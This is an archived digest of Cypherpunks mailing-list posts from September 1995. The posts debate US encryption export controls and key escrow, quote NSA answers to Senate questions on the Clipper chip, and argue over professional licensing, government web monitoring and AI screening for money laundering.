The breakout session that I was in was directly charged with this issue. We talked at length about it. There were NIS&T and NSA folks at the session. The consensus was that the Government wanted to prevent a version of PGP that was export enabled (GAK and short keys) that would be backward compatible. The group stated strongly that this was a "non starter." That is, it was unacceptable. Vendors wanted "sales appeal." That means compatibility with existing software. And compatibility with existing export-approved systems. [DES has been exported to "friendly" countries with strict controls.] And criteria #2 specifically outlawed superencryption. No DES | TRAN | DES | TRAN | DES. They were serious. Talk to CME, he was in that session. I believe that this criterion is stupid, or at least ill-advised. But the govies insisted. All the more justification to ignore the US rules and develop off-shore.

Pat

Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info.
Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From tcmay at got.net Wed Sep 13 19:26:27 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 13 Sep 95 19:26:27 PDT Subject: An opportunity not to be missed Message-ID: At 1:57 AM 9/14/95, Bill Stewart wrote: >Is Wavy Gravy running his "Nobody for President" campaign again this time? >After all, Nobody's going to balance the budget, and Nobody's going to >get the government out of your bedroom, and on the internet, Nobody can tell >if you're a dog or not :-) Or to update it for today: "Nobody at remailer.org for President." --Tim ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From mnorton at cavern.uark.edu Wed Sep 13 19:31:38 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 13 Sep 95 19:31:38 PDT Subject: CYPHERPUNK considered harmful. In-Reply-To: <199509131926.PAA14458@panix.com> Message-ID: I don't know about national characteristics. After all, "What's in a name? Would a rose by any other name..." and so on. Cypherpunk fits. Cypherpunk suits. So, if the suit fits... MacN On Wed, 13 Sep 1995, Duncan Frissell wrote: > At 10:57 AM 9/13/95 -0700, Timothy C. May wrote: > > >While I have had some qualms about the name, on balance I think it has been > >good for us. After all, it's not as if _other_ groups don't already exist! > >In particular, the British branch of Cypherpunks disliked the name > >"Cypherpunks" so much that they used a different name for themselves, the > >"U.K. Crypto Privacy Association." It doesn't seem to exist anymore, for > >whatever reasons. 
But the name may have been a factor, at least. > > Note too that Brits differ from Americans. "Wired" worked well here from > the beginning but has had problems there. Differing national characteristics. > > DCF > > "Let's all just agree to disagree. My system can thrive with widespread > disagreement among rabid individualists --- can yours?" > > From mnorton at cavern.uark.edu Wed Sep 13 20:05:59 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Wed, 13 Sep 95 20:05:59 PDT Subject: Digital Fingerprinting In-Reply-To: <9509131457.AA17323@cantina.verity.com> Message-ID: On Wed, 13 Sep 1995, Patrick Horgan wrote: > > > > > Then, in W.Ky., as in Stockbridge, "You can get > > > anything you want..."? :) > > > > I'd stick with: > > *********************************************** > > You can't always get what you want 1 > > but if you try > > sometimes, sometimes you get what you need. 2 > > *********************************************** > > > > 1 ability to dump garbage where you want > > 2 a better appreciation for the environment > > :-) > > > Why do I feel like I'm sitting on the group W bench? I don't know, kid, what you in for? MacN From bdavis at thepoint.net Wed Sep 13 20:52:48 1995 From: bdavis at thepoint.net (Brian Davis) Date: Wed, 13 Sep 95 20:52:48 PDT Subject: CAGK rationale (was: Re: GAK/weak crypto rationale?) In-Reply-To: <9509132212.AA28200@tis.com> Message-ID: On Wed, 13 Sep 1995 cme at acm.org wrote: > >Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT) > >From: Brian Davis > > > In our district, we > >managed to convict almost 20 people in an investigation of the state > >legislature, including the now-former Speaker of the House and > 6 other > >legislators. Bribing lobbyists took hits, etc. > > > >Particularly effective were the court-approved video and audio tapes of > >the Speaker taking a bribe in exchange for certain action on legislation > >and responding to the bribing party: "Well bless your heart." > >That has become the office's mantra. 
> > Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with > all gov't officials forced to use keys held by various newspapers and > other watchdog agencies.... > > The video and audio bugs aren't part of the wiretap process so they don't > apply here. > You need to reread Title III. The same law applies. And when encryption defeats all wiretaps, there will likely be more "interceptions of oral communications." That is, bugs. And that's something I hadn't thought of until just now. EBD > - Carl > > +--------------------------------------------------------------------------+ > |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | > |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | > | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | > +----------------------------------------------------------- Jean Ellison -+ > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!!

From shamrock at netcom.com Wed Sep 13 21:10:20 1995 From: shamrock at netcom.com (Lucky Green) Date: Wed, 13 Sep 95 21:10:20 PDT Subject: [Meeting at Tim's house participant] Who wanted the AT&T UNIX for 8086/80286 ? Message-ID: <199509140407.AAA12906@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Would the person who expressed interest in my collection of genuine AT&T UNIX for the AT&T 6300 (an 8086) and 6300 Plus (an 80286) complete with several shelf feet of hard-cover documentation as well as the developer kit please get in touch with me? As for the rest of you: you may stop laughing now ;-) - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMFeqlyoZzwIn1bdtAQEkswF/dxu8jYNFjLVRK+3SbNy9ee2fc4xzsro6 elH7VHUX85Y/23EQmL0wBoVkAyqHKk0Z =uYSW -----END PGP SIGNATURE-----

From goedel at tezcat.com Wed Sep 13 21:16:44 1995 From: goedel at tezcat.com (Dietrich J. Kappe) Date: Wed, 13 Sep 95 21:16:44 PDT Subject: Need ideas. NFP to monitor law enforcement on the net. Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Dear cpunks, after reading several articles about government sting operations in the US and Bavaria, I'm thinking of starting a not for profit to collect and disseminate information on law enforcement on the net. I know how to register a NFP Corp, and certainly know about mailing lists and web pages, but other problems still remain to be solved. Specifically: 1) Is it better to be a national or state registered NFP? (Given the level of LEA hassling I might experience.) 2) What if I start a mailing list and nobody shows up? Whose participation should I ensure so that the effort is a success. 3) What are some good sources of information for LEA's on the net? Any suggestions would be most welcome. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBgAwUBMFe6MnIf3YegbdiBAQHmeAJYz4bKtqPJvcdyUxcuVEOVgAYNO3sRuUzW lnYnq7o2qBMcePAW8xTVECmwt8DXTbutSTJC10DBHdyjDGdgdwwN3ne0mCWN7Pig uDUk =W0pp -----END PGP SIGNATURE----- Dietrich J. Kappe | Red Planet http://www.redweb.com/ Red Planet, L.L.C.| "Chess Space" /chess 1-800-RED 0 WEB | "MS Access Products" /cobre Web Publishing | PGP Public Key /goedel/key.txt

From nobody at REPLAY.COM Wed Sep 13 21:25:54 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 13 Sep 95 21:25:54 PDT Subject: NSA on GAK Message-ID: <199509140420.GAA10736@utopia.hacktic.nl> The opening comments here by Admiral McConnell of the NSA appear to parallel the comments of Mr. Michael Nelson at the September 6 NIST Key Escrow meeting on the use of encryption by "spies, terrorists, and criminals."
URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt ---------- Note: The following answers were provided by NSA to the Senate Subcommittee on Technology and the Law in response to their follow- up questions to the May 3, 1994 hearings. --------------------------- Senate Subcommittee on Technology and the Law Hearing on the Administration's Key Escrow Encryption Standard Written Questions for Vice Admiral McConnell, NSA *Questions for Senator Pressler: Q: Admiral, as you are aware, critics of the Administration's proposal argue that as a practical matter, no criminal, foreign spy, or terrorist of any sophistication would be foolish enough to use an encryption device designed by the NSA and approved by the FBI. How do you respond? Why do[n't you] think the people whose telecommunications the NSA and the FBI want most to decode will be the very people most unlikely to use this technology? Answer: From what we know today, the overriding requirement that spies, terrorists, and criminals have is for readily available and easy to use equipment that interoperates. Key escrow encryption is not meant to be a tool to catch criminals. It will make excellent encryption available to legitimate businesses and private citizens without allowing criminals to use the telecommunications system to plan and commit crimes with impunity. We believe it would be irresponsible for government to make excellent encryption broadly available knowing that its use by criminals would make it impossible for law enforcement agencies to conduct lawful wiretaps against them. The Department of Justice credits information gleaned through wiretaps as leading to more than 20,000 felony convictions since the early 1980s. This would not have been possible if the criminals had been using encryption systems the FBI could not break. Without government action, however, this fortunate situation will change. At present most people, and most criminals, don't use encryption.
However, there is an increasing public awareness of the value of encryption for protecting private personal and business communications. Increasing demand for encryption by the public will likely lead to the widespread use of some form of standardized encryption on the public telecommunications network. This development would have great benefits for the country. Legitimate businesses and private individuals could use the telecommunications system secure in the knowledge that their private information such as business records and credit card numbers could not be intercepted by third parties. But there is a down side. Criminals, terrorists, and others could also use the system to plan crimes, launder money, and the like, completely secure in the knowledge that law enforcement agencies could not listen to those communications. Just as legitimate businesses operate much more efficiently and effectively using the telecommunications system than they could without it, so will criminal enterprises be able to operate more efficiently and effectively if they no longer have to avoid using the telecommunications system. The United States is faced with a choice. We can sit back and watch as the emerging national information infrastructure becomes a valuable tool for criminals and terrorists to use to plan and carry out their activities with complete security, or we can take steps to maintain the current ability of government to conduct lawful wiretaps so that prudent criminals will have to find other less efficient ways to operate and foolish ones may be caught. Key escrow encryption is the latter option. Q: Would widespread use of the Skipjack algorithm harm U.S. exports? Do you think it is unlikely foreign businesses will purchase American encryption technology if the U.S. Government holds a set of the decoding keys? Answer: I do not believe that widespread use of key escrow encryption in the United States will harm U.S. exports.
If it has any effect at all, it could increase exports somewhat. Key escrow encryption products provide another option for foreign purchasers that they have not had in the past; to the extent that foreigners do purchase key escrow encryption products, it will mean an increase in exports. Meanwhile, U.S. exporters are free to continue to sell the products they currently sell in foreign markets and to seek license approvals for new products. It is difficult to predict the foreign market for U.S. key escrow encryption technology. Businesses that fear U.S. Government interception of their communications presumably would avoid products for which the U.S. Government holds keys. However, there are a number of reasons why foreign businesses might purchase them. One major reason would be to communicate securely with U.S. businesses that use them. In addition, the superior level of security provided by key escrow products (against all but lawful U.S. Government access) may make them attractive to foreign businesses that do not view U.S. Government access as a major concern. While some prospective users abroad may steer clear of key escrow products because the United States will retain access, there may be many who believe they are unlikely to be targeted by U.S. intelligence in any case or for whom the superior security offered by key escrow encryption products against threats of greater concern may make key escrow products an attractive option. For example, a distributor of pay-TV programming may depend on encryption to ensure that only those viewers who pay for the service can decrypt the TV signal. Such a distributor probably would not be concerned about the threat of access by the United States Government, and might favor suitable key escrow encryption products over competing products that use weaker encryption algorithms. Q: You were present when the previous panelist, Stephen Walker, described how present U.S. laws prohibit his company from exporting encryption products.
As I understand it, Senator Murray's bill S.1846, attempts to relax these export controls somewhat. Please give us your views on this legislation. Answer: I support the Administration's position, as announced by the White House on February 4, that current export controls must remain in place and that regulatory changes should be implemented to speed exports and reduce the licensing burden on exporters. The bill you reference appears to be inconsistent with the Administration position. I would be happy to provide you further information on the Administration's reasons for maintaining the current export controls in an appropriate setting. *Questions from Senator Murray: Q: In my office in the Hart building this February, I downloaded from the Internet an Austrian program that uses DES encryption. This was on a laptop computer, using a modem over a phone line. The Software Publishers' Association says there are at least 120 DES or comparable programs world wide. However, U.S. export control laws prohibit American exporters from selling comparable DES programs abroad. With at least 20 million people hooked up to the Internet, how do U.S. export controls actually prevent criminals, terrorists, or whoever from obtaining DES encryption software? Answer: Serious users of encryption do not entrust their security to software distributed via networks or bulletin boards. There is simply too much risk that viruses, Trojan Horses, programming errors, and other security flaws may exist in such software which could not be detected by the user. Serious users of encryption, those who depend on encryption to protect valuable data and cannot afford to take such chances, instead turn to other sources in which they can have greater confidence. Such serious users include not only entities which may threaten U.S. national security interests, but also businesses and other major consumers of encryption products.
Encryption software distribution via Internet, bulletin board, or modem does not undermine the effectiveness of encryption export controls. [Primary written questions for Admiral McConnell] 1. The Defense Authorization Bill for Fiscal Year 1994 has authorized $800,000 to be spent by the National Research Council of the National Academy of Sciences to conduct a study of federal encryption policy. Can we wait to implement the key escrow encryption program until we have the benefit of the NRC's study? Do you think this study is necessary? Should this study be expedited? Answer: We do not believe that we can wait until after the NRC study is completed in 1996 to begin implementation of the key escrow initiative. The information technology industry is dynamic and fast-moving, and to wait another two years or more would, we believe, jeopardize the success of the initiative. Industry demand for encryption products is growing, and the technology is available now to meet that demand with encryption products that provide an outstanding level of security to the user conduct lawful wiretaps. To wait for the completion of the NRC study to other encryption products which would defeat lawful wiretaps. We believe that such a delay would not be in the best interest of the American people. Neither do we believe that the study should be expedited. For our part, we will carefully consider the conclusions of the NRC study. We expect that it will give very careful consideration to the issues, and we would not want the pressure of an unnecessarily short deadline to limit the study group's ability to produce the best report possible. 2. The Administration has said that it is continuing to restrict export of the most sophisticated encryption devices, in part, "because of the concerns of our allies who fear that strong encryption technology would inhibit their law enforcement capabilities." 
Do we really need to help our allies by prohibiting the export of strong American encryption products, since those same countries can simply control the encryption bought within their borders? Answer: Exports of encryption products are subject to review primarily to protect U.S. national interests, including national security, law enforcement, foreign policy, and other important interests. The law enforcement concerns of our allies are a consideration, especially as the ability of our allies to combat terrorism, drug trafficking, and other international law enforcement problems can have direct benefits to the United States. However, foreign law enforcement concerns do not drive our export control policy. We would continue to review encryption exports to protect U.S. national interests even if foreign law enforcement concerns disappeared. 3. Do you know whether foreign governments would be interested in importing key escrow encryption products to which they hold the decoding keys? Answer: Several foreign governments have expressed interest in key escrow encryption technology due to their own law enforcement concerns. There have been some preliminary discussions, but issues such as who would hold the escrowed keys and the circumstances of government access to escrowed keys must be fully vetted. 4. The Government wants the key escrow encryption standard to become the de facto industry standard in the United States. Would the Government abandon the Clipper Chip program if it is shown to be unsuccessful beyond government use? Answer: We do not expect the program to be unsuccessful beyond government. We have developed a sound security product that we expect will find many uses in government information systems and further believe that government use will bring with it a commercial market, particularly in the defense sector. 
We have developed a sound security product that we expect will find many uses in government information systems regardless of its success in commercial markets.

5. Openly available devices, such as Intel-compatible microprocessors, have seen dramatic gains, but only because everyone was free to try to build a better version. Given the restrictions on who can build devices with the classified Skipjack algorithm, how will key escrow chips keep up with advances in semiconductor speed, power, capacity and integration?

Answer: Despite the requirements that a firm must meet to produce key escrow encryption chips, we expect that there will be a number of manufacturers competing against each other to produce the best product, and that such competition will drive them to keep up with the latest technological advances. It is worth noting that only a few companies can produce the sophisticated microprocessors you reference, yet the competition in that market has driven them to achieve remarkable advances in that technology. NSA's STU-III secure telephone program provides an example of a cryptographic product line that keeps pace with technology. The presence of a classified algorithm does not preclude keeping pace with technology. Through NSA's use of a competitive, multi-vendor approach, STU-III secure telephone products have continued to evolve in response to user requirements and technological advances despite their use of a classified encryption algorithm and the consequent need for security restrictions on the manufacturers.

6. How well does the Skipjack algorithm work on telecommunications operating at very high speeds? Is NSA working on another algorithm, called BATON, that could be used at high speeds with a key escrow system? Will Capstone be compatible with BATON?

Answer: Using currently available microelectronics technology, the SKIPJACK algorithm could not be used for encryption at very high speeds.
BATON is the name of an algorithm developed by NSA that could be used at higher rates of speed. We have no plans to develop key escrow encryption devices using BATON, however. Instead, we are considering another algorithm for use at high speeds with a key escrow system. A high-speed key escrow device based on an algorithm other than SKIPJACK would not be "compatible with Capstone" in the sense that traffic encrypted by such a device could not be decrypted by Capstone, and vice versa. However, since such a device would be used for much higher-speed applications than those for which Capstone was designed, there would be no need for it to be compatible with Capstone in that sense.

7. Can Capstone be used to encrypt video programming? If so, have cable companies been approached by any government agency to use Capstone to scramble or encrypt cable programming?

Answer: Capstone could be used to encrypt any digital signal, including video programming, operating at up to about 10 million bits per second. It could be used for encrypting individual video channels but not for bulk encryption of many channels multiplexed together in a single link. NSA is not aware of any government agency approaching cable companies to urge the use of Capstone. Two manufacturers have asked us about the suitability of key escrow devices for this purpose, however.

8. Encryption software is available that can be used with Clipper to encrypt a message before after it has been encrypted with Clipper. This "double encrypting" risks bypassing the key escrow feature. If a sender first encrypts the message with software using DES, and then transmits the message "double encrypted" with Clipper, can you tell from looking at the cipher, or encrypted text, that the underlying message was encrypted?

Answer: The only way to tell that a message has been "double encrypted" in this way would be to decrypt the "outer layer" of encryption, i.e. that done with Clipper.
Only then would one be able to tell that the message had first been encrypted with something else.

----------

From dsc at swcp.com Wed Sep 13 21:26:13 1995
From: dsc at swcp.com (Dar Scott)
Date: Wed, 13 Sep 95 21:26:13 PDT
Subject: cryptography eliminates lawyers?
Message-ID:

Black Unicorn wrote,
>On Wed, 13 Sep 1995, Dar Scott wrote:
>
>> Black Unicorn wrote,

[snip]

We seem to be having problems with the meanings of words. For example, I make a distinction between certification and licensing. Also, I see violence and coercion as being ultimately related to something physical. I'm not sure what "proper", "competent to practice"... mean. And I see a big difference in a market based monopoly and a government based monopoly.

[snip]

>Didn't I just say this above?
>
>A centralized, or several centralized authorities.

I had assumed you meant by authority an agent of the state that is able to invoke or otherwise wield the physical force of the state. By certifying entities I was referring to private organizations that had no similar power or to government organizations that had only the power to provide information.

By a licensing entity I was referring to an organization that can coerce to prevent the unlicensed from doing the licensed behavior. By coercion I meant the threat of physical force or the force itself. Though one might think of physical force as applying to murder, kidnapping, slavery, assault, robbery, physical theft, I would also apply it to theft or damage of abstract property that has properties like physical property. I intend for these to apply to many actions of the state.

Perhaps I erred in applying "certification" and "license" to these contrasting concepts, but I do think the distinction is important and the observation that there are fuzzy areas in between does not remove that.

If I have a license from the local gang to sell drugs and the guy across the street does not, I could encourage the gang to do something and the guy might get shot.
Similarly, if I was a PE and my competitor across the street was not, I could encourage the state to do something that--with several stages of his lack of cooperation--results in his finding a gun in his face or worse.

>I guess the center of my question is, how can you apply Web of Trust to
>e.g. a university degree. Who cares what Bob and Alice think my degree
>is in, the client only wants to know from the institution.

It does not matter why people would trust a certifying entity. It might have a great earned reputation, it might "borrow" some reputation from bonding or audits, or it might have ties to the Real World.

>> Licensing can only be done by an
>> entity that can use physical force to prevent
>> buying and selling legal services.
>
>I believe you are incorrect, but I guess my main concern is your
>characterization of "Physical force." I am assuming you mean coercion,
>and not that you will be jailed or such (though this may be the case).
>
>I would argue that as long as coercion exists (violence of any type,
>physical or not) you have a licensing authority. Take the hollywood
>blacklist. No one actually pushed around suspected pinko screenwriters
>(well, at least, if anyone did, it was incidental) but they certainly
>faced a great deal of persuasive motivation. Look at the committee as
>the licensing authority here. (Licensing you as a non-communist as it were).

It seems I am using coercion in a different sense. Unless blacklisting has physical force at its root enforcement mechanism it is not coercion and is very fragile.

>If several governmental and private authorities were in the practice of
>certifying that Bob has a law degree from Tremont University, and that he
>is competent to practice in D.C., and given that the citizens of D.C.
>will look for these credentials, isn't this a license? Afterall, Bob has
>to pass some test or requirement to get the signatures. Isn't this
>coercion in your definition?

No. I apologize for any confusion.
>Can't the multiple authorities set common
>or near common guidelines? Rather, don't they HAVE to in order to have
>their signatures worth the electrons they are transmitted with?

In general, No. Under many conditions market forces make services alike, but more often competing businesses find particular market niches. I would expect that different certs would cover different levels of expertise, different specializations and different breadths of specializations. Any lawyer might have a dozen certs. I would not expect there to be a single level of certification for all applications. I know of several companies in which the primary product designer has no engineering degree.

>If you take the extreme position you seem to, there's an antitrust case here.

I don't insist there has to be a variety. I only desire that coercion does not come into play in preventing it. As I said, if a natural monopoly forms at times, I am not worried.

>Am I not "licensing" my key signature to people provided they pass my key
>signature criteria? Am I not doing violence by withholding my signature
>and the benefits it might convey for certain "terms?"
[snip]
>This is the trap of the licensing argument.

I see a big difference in withholding a signature and sending gunmen. There is no violence in withholding a signature.

>The evil is not licensing, which I think serves a real purpose, but
>created convenience fees, taxation through the withholding of licensing
>and the use of other government largess. I wrote a massive piece on this
>and sent it to the list about a year and a half ago. With interest I will
>repost it.

Even if no one else is interested, I'd like to see it.

>The real question is how you decide what an authority to license is. Is
>it to be dictated by government? Or by market forces (i.e. the
>reputation of the licenser).

Yes, the government vs. market question is key, but I believe the answer is in that distinction I used in contrasting terms "certification" and "license".
The "who" is tied up in what the instrument is.

>> >I don't see how the net will eliminate the basic need for highly
>> >qualified professionals and the proof that they have credentials.
>>
>> It won't. The needs might shift a little but they
>> will be there.
>
>Then why will lawyers, or a 'professional monopoly' be broken?

The meaning of "qualified professional" and "credentials" will be market-based and multidimensional, not defined by the state or a group already "qualified" using the state for enforcement.

[snip]

Concerning a market-based monopoly,
>> Not so bad if it happens,
>> but much more honest, efficient and softer-edged
>> than "licensed to practice".
>
>I'm not so sure. There will be a tremendous amount of corporate power in
>these authorities, and if (as you seem to be saying a few paragraphs up) it
>is hard to break into the trusted certification business, there is a
>monopoly again.

I don't really think this is a problem. It is the force-based monopoly and specifically the government-based monopoly I have a problem with.

[snip]
>Like the several state Bars?

The market advantage is slight.

[snip]
>So you have essentially admitted that a central authority is required?
>Or will be more often used?

Not required.

[snip]
>If your definition of license is simply who does the coercing, I think you
>should reconsider.

Whatever the word used, I see the distinction between 1) the assertion of certain information and 2) the threat of force as being key.

Perhaps I could have used the phrases "non-coercion-based" licensing and "coercion-based" licensing, but I am not comfortable with these--trade licensing invokes too violent of an image.

A note to all in government licensed trades: I recognize that licensing is part of the real world we live in. Often one has to be licensed to practice a favorite trade. I do not mean to describe the licensed themselves as violent.
Dar

===========================================================
Dar Scott                  Home phone: +1 505 299 9497
Dar Scott Consulting       Voice:      +1 505 299 5790
8637 Horacio Place NE      Email:      darscott at aol.com
Albuquerque, NM 87111                  dsc at swcp.com
                           Fax:        +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================

From damion.furi at the-matrix.com Wed Sep 13 21:28:40 1995
From: damion.furi at the-matrix.com (DAMION FURI)
Date: Wed, 13 Sep 95 21:28:40 PDT
Subject: (NOISE) Re: White House M
In-Reply-To: <8B1023A.000504FC46.uuout@the-matrix.com>
Message-ID: <8B10562.000504FFB4.uuout@the-matrix.com>

|> Maybe so, but we don't have to like it. And I don't. But
|> it's not so much their access, per se, that I object to.

F|Why the hell do you care ? Someone has a home page for something on the Web.
|Someone at the White House looks at it. So what ? You object to the fact
|that somebody in the government has a Web browser and *gasp* uses it to read
|stuff on the WWW ???

What did I just write? It's not so much their access...

|> It's their potential intentions,

F|You take moral offense to what you think someone else _might_ be thinking ?

Not normally, no. But I've found a number of reasons to take offense at more overt government actions, and I see no reason not to take offense at obscure government actions. Especially when it involves spooks (NSA, DOD, military branch agencies, CIA, FBI, DEA, alphabet soup agency of choice).

|Sounds like you believe in thoughtcrime. Banned any good books lately ?

I _DO_ believe in thoughtcrime. I think it's a goddamned crime when some dickhead with more power than sense attempts to limit the actions of private citizens, in complete disregard for the idea of "presumed innocent until proven guilty." If someone so much as THINKS this, I have a problem with them. Now, go fuck yourself.

F|> all things considered, and
|> the fact that they aren't at all open about such monitoring.

F|This is absurd.
|You expect the White House to issue a press release every time
|a staffer clicks on a URL ?

No. I want to know what they're monitoring on a general basis and why. It's my tax money, too. But they aren't open about the monitoring. Half the time they deny doing it at all, and the rest of the time they come up with a few dozen specious excuses.

furi at the-matrix.com
pgp-public-key at demon.co.uk C1225CE1
RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support

From tfs at vampire.science.gmu.edu Wed Sep 13 22:17:21 1995
From: tfs at vampire.science.gmu.edu (Tim Scanlon)
Date: Wed, 13 Sep 95 22:17:21 PDT
Subject: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130255.AA03446@sulphur.osf.org>
Message-ID: <9509140517.AA01328@vampire.science.gmu.edu>

I know a few folks at eop, and I can tell you that it's a tad bigger setup than a few boxes in bill's private office. This is the "office" of the executive, not "the executive office". There's a good amount of people who work there. Most of them are good folks too. They are not power hungry nuts, they are not bad clones of "The Monroes", they are not weirdos like "Cancer Man" out of the X-Files; in fact, in many cases they are just real normal people who believe in trying to do something for their fellow citizens. They don't *do* partisan politics, and in fact, partisan politics are the greatest source of fear for their job security. I've watched a lot of *good* people, by ANYONE'S standards, leave their jobs in the government lately due to the lack of support they have gotten from the congress & the executive branch, and I know how bad morale is in places where everyone would be better served if people didn't have to worry about how to feed the kids next month.

Don't get me wrong, I don't agree with a lot of *political* stuff that's going on at all.
But the idea of some poor sod worrying about his job because he decided to check out a web site with "controversial" material is enough to make me vomit. Attributing a conspiracy to this is just plain and simple ignorance. Any agency worth much wouldn't "monitor" from a site with a big 'ol .gov at the end of the IP. THEY aren't that stupid, but apparently the whackos in the woodpile think that people would be that dumb. Personally I'd be flattered if some gov site were looking at "dissident" material I put up, if I chose to do that; God knows it might actually mean my elected representatives were listening, or at least their staff might be.

I swear, Clinton "scandals" make me nostalgic for the 'ol republican days when we had REAL scandals like Watergate & Iran-Contra... All this Foster crap & black helicopters just strikes me as goofy, and in some cases ignorantly obnoxious. I guess this is what happens when the trailer park crowd gets on the net...

Tim
________________________________________________________________
tfs at vampire.science.gmu.edu (NeXTmail, MIME)    Tim Scanlon
George Mason University (PGP key avail.)          Public Affairs
I speak for myself, but often claim demonic possession

From fstuart at vetmed.auburn.edu Wed Sep 13 23:36:59 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Wed, 13 Sep 95 23:36:59 PDT
Subject: An opportunity not to be missed
Message-ID: <199509140636.BAA08330@snoopy.vetmed.auburn.edu>

>It has occurred to me with the approach of the presidential campaign
>in the US (and its attendant press frenzy), that there is an
>unprecedentedly vast opportunity to bring certain items on the
>cypherpunk platform into the public spotlight.
[...]
> Candidate Posturing            Required Spin
> -----------------------------------------------------------------
> Pro-business, tough on crime   anonymous crime tip e-mail
>                                a la Fed whistleblower stuff,
>                                and the SPA
[...]
Now that you mention it, it seems to me that completely anonymous tipsters with the ability to receive ecash rewards would likely be a bigger boon to law enforcement types than would easily tappable communications lines.

Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for use through the remailers)? You could set up a web-page with instructions and a list of crimes for which there are rewards. Perhaps some civic organizations would be willing to donate money for tips leading to arrests and convictions of any crimes. Even if it doesn't catch any bad guys, it'd be great PR for strong crypto, anonymity, ecash and whoever runs it.

                              | (Douglas) Hofstadter's Law:
Frank Stuart                  | It always takes longer than you expect, even
fstuart at vetmed.auburn.edu     | when you take into account Hofstadter's Law.

From frissell at panix.com Thu Sep 14 02:26:05 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 14 Sep 95 02:26:05 PDT
Subject: AOL Porno
Message-ID:

Will the federal prosecutors and Fibbies on this list please emphasize that the Internet was not involved in the AOL kiddie porn case. The Internet has enough opportunities for bad publicity as it is.

DCF

"Who wonders: How it is that CompuServe was able to exist from 1979 to the arrival of Prodigy and AOL without major sex, and drugs, and rock and roll problems?"

From madden at mpi-sb.mpg.de Thu Sep 14 02:58:03 1995
From: madden at mpi-sb.mpg.de (Peter Madden)
Date: Thu, 14 Sep 95 02:58:03 PDT
Subject: Software vs Money Laundering
In-Reply-To:
Message-ID: <9509140957.AA03082@mpii02024.ag2.mpi-sb.mpg.de>

Duncan Frissell's email (Sep 13 17:52:55), in reply to John Young, gives some problems regarding an AI screening program for detecting illicit electronic money transfers:

> Not the least of which [problems] is that money launderers can use "AI
> Software" to generate a stream of real and dummy money transfers that
> emulates "normal" money transfers.
> Not to mention the fact that
> monopoly money transfer networks that can be surveilled by the Feds
> (FEDWIRE and SWIFT) are not long for this world. They will be
> replaced by encrypted, open, net-based systems.

There are also more basic problems. An essential initial stage in the development of such AI programs, a kind of expert system, is the analysis of the behaviour of the human "experts". In this case the experts being the wily money launderers. The program can then, allegedly, spot all those trademark traits of the money launderer and nab him/her. Trouble is, the program therefore represents a kind of blue-print of what the aspiring money launderer should *not* do when making illicit electronic money transfers. Any "expert system" that operates by recognizing, and acting upon, human behaviour (regardless of whether or not that be on the net) can be foiled by altering, or disguising, that behaviour (the "dummy money transfers" mentioned by DCF would be one way of duping the system).

Of course, the officials at law will claim rousing successes and cite numerous convictions -- but as with the drug trade, that will only be the tip of the ice-berg with no real clues as to the size of the base. The tip of the ice-berg will simply be what the AI program has succeeded in formally "capturing".

Pete

=================================================================
Dr Peter Madden,                          Email: madden at mpi-sb.mpg.de
Max-Planck-Institut fuer Informatik,      Phone: (49) (681) 302-5434
Im Stadtwald, W-66123 Saarbruecken, Germany.  Fax: (49) (681) 302-5401

From frissell at panix.com Thu Sep 14 03:01:28 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 14 Sep 95 03:01:28 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To:
Message-ID:

On Wed, 13 Sep 1995, Black Unicorn wrote:

> But won't clients insist on proper credentials in one form or another?
> Doesn't the practicality and accountability of a centralized authority
> (or several authorities) provide the best answer to this? Who is going
> to accept my signature promising that I did indeed get a law degree and
> pass the bar?

An educational institution can certify its own graduates --- it does now. Competing credentialing institutions is exactly what I would be looking for as opposed to today's coercive monopoly. No matter how skilled, it is illegal for an unlicensed person to practice law, medicine, or many other professions in any state. The nets weaken these restrictions because they allow action at a distance.

Note the other effects of the nets. They make it hard to tell that you *are* working, which reduces the impact of regulations of work by "illegal aliens." Thus if I am wandering through the South of France while writing the 'Great American Novel' I am unlikely to get busted for violation of work restrictions. The nets expand the number of jobs I can do while innocently wandering the South of France. I can or will soon be able, for example, to manage a large international corporation from anywhere.

DCF

"Who actually prefers Le Massif Central to those hot and crowded southern climes."

From unicorn at polaris.mindport.net Thu Sep 14 03:21:13 1995
From: unicorn at polaris.mindport.net (Black Unicorn)
Date: Thu, 14 Sep 95 03:21:13 PDT
Subject: cryptography eliminates lawyers?
In-Reply-To:
Message-ID:

On Wed, 13 Sep 1995, Dar Scott wrote:

> Black Unicorn wrote,
> >On Wed, 13 Sep 1995, Dar Scott wrote:
> >
> >> Black Unicorn wrote,
> [snip]
>
> We seem to be having problems with the meanings of words. For example, I
> make a distinction between certification and licensing.

